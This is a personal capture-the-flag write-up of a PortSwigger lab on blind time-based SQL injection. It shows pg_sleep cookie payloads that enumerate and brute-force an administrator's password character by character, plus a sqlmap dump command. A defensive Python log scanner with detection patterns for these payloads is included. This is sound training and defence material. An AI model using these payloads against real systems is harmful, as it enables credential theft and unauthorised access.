PortSwigger Academy Lab: Blind SQL injection with time delays and information retrieval

Jun Takemura · March 17, 2025

Task

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Attempt

Checking the SQLi cheat sheet, I tried conditional time-delay payloads in the tracking cookie:

1'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--+-

This one (PostgreSQL syntax) caused a delay.

Enumerate the password length by varying the number the length is compared against:

1'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END+from+users--+-

The length was 20. (You can see the time difference in the Response received column.)

With Intruder, brute-force the character at the 'a' payload position:

1'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END+from+users--+-

In SUBSTRING(password,1,1)='a', password is the column name; the first 1 is the starting position (the first character of the password) and the second 1 is the number of characters to extract.

You can create a wordlist using bash:

printf "%s\n" {a..z} | xclip -selection clipboard

And numbers:

seq 0 9

With this method, I figured out the first letter was k.

Change the starting position from 1 to 2:

1'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='a')+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END+from+users--+-

Repeat this until you get the whole password.
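From the defender's side, the payloads above are easy to spot in server logs once the cookie is URL-decoded. The following Python is an added example (not part of this write-up or the lab) that scans constructed access-log lines for the time-delay patterns used here; the log format and the rt= response-time field are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not real lab traffic); rt= is an assumed
# response-time field in seconds. Line 3 carries the sanity-check payload
# from the write-up, line 4 the SUBSTRING probe for 'a' (false branch, no delay).
SAMPLE_LOG = [
    '203.0.113.5 "GET / HTTP/1.1" 200 rt=0.011 Cookie: TrackingId=u7Yq3Kd9Ls2Wx; session=abc',
    '198.51.100.7 "GET /login HTTP/1.1" 200 rt=0.009 Cookie: session=ghi',
    '203.0.113.9 "GET / HTTP/1.1" 200 rt=10.021 Cookie: TrackingId=1\'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--+-; session=def',
    '203.0.113.9 "GET / HTTP/1.1" 200 rt=0.013 Cookie: TrackingId=1\'%3BSELECT+CASE+WHEN+(username=\'administrator\'+AND+SUBSTRING(password,1,1)=\'a\')+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END+from+users--+-; session=def',
]

# Indicator patterns, matched against the lowercased, URL-decoded cookie value.
INDICATORS = {
    "pg_sleep": re.compile(r"pg_sleep\s*\("),             # PostgreSQL delay
    "mysql_sleep": re.compile(r"(?<![a-z_])sleep\s*\("),  # MySQL delay
    "mssql_waitfor": re.compile(r"waitfor\s+delay"),      # SQL Server delay
    "conditional": re.compile(r"case\s+when"),            # CASE WHEN branch
    "stacked_query": re.compile(r"'\s*;\s*select"),       # quote break + stacked SELECT
    "comment_tail": re.compile(r"--\s*-?\s*$"),           # trailing SQL comment
}
COOKIE_RE = re.compile(r"TrackingId=([^;\s]*)")
RT_RE = re.compile(r"rt=([0-9.]+)")


def decode_tracking_id(line):
    """URL-decode the TrackingId cookie value from a log line, or None if absent."""
    m = COOKIE_RE.search(line)
    return unquote_plus(m.group(1)) if m else None


def sqli_indicators(value):
    """Names of the indicator patterns present in a decoded cookie value."""
    lowered = value.lower()
    return [name for name, rx in INDICATORS.items() if rx.search(lowered)]


def scan_log(lines):
    """Return (line_no, response_time, indicators) for each suspicious line.
    Matching keys on the payload, not latency: a false-branch probe returns
    immediately yet is still an injection attempt worth alerting on."""
    hits = []
    for n, line in enumerate(lines, start=1):
        value = decode_tracking_id(line)
        found = sqli_indicators(value) if value is not None else []
        if found:
            rt = RT_RE.search(line)
            hits.append((n, float(rt.group(1)) if rt else None, found))
    return hits
```

The real fix is on the application side: the cookie value must go into the query as a bound parameter, never by string concatenation.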

Tried SQLMap too:

sqlmap -u "0a0f00f403fd1f8381c6347c00c50020.web-security-academy.net" --technique=T --cookie="TrackingId=1*" --batch --dump --level 5 --risk 3 --dbms=PostgreSQL

It didn't work.
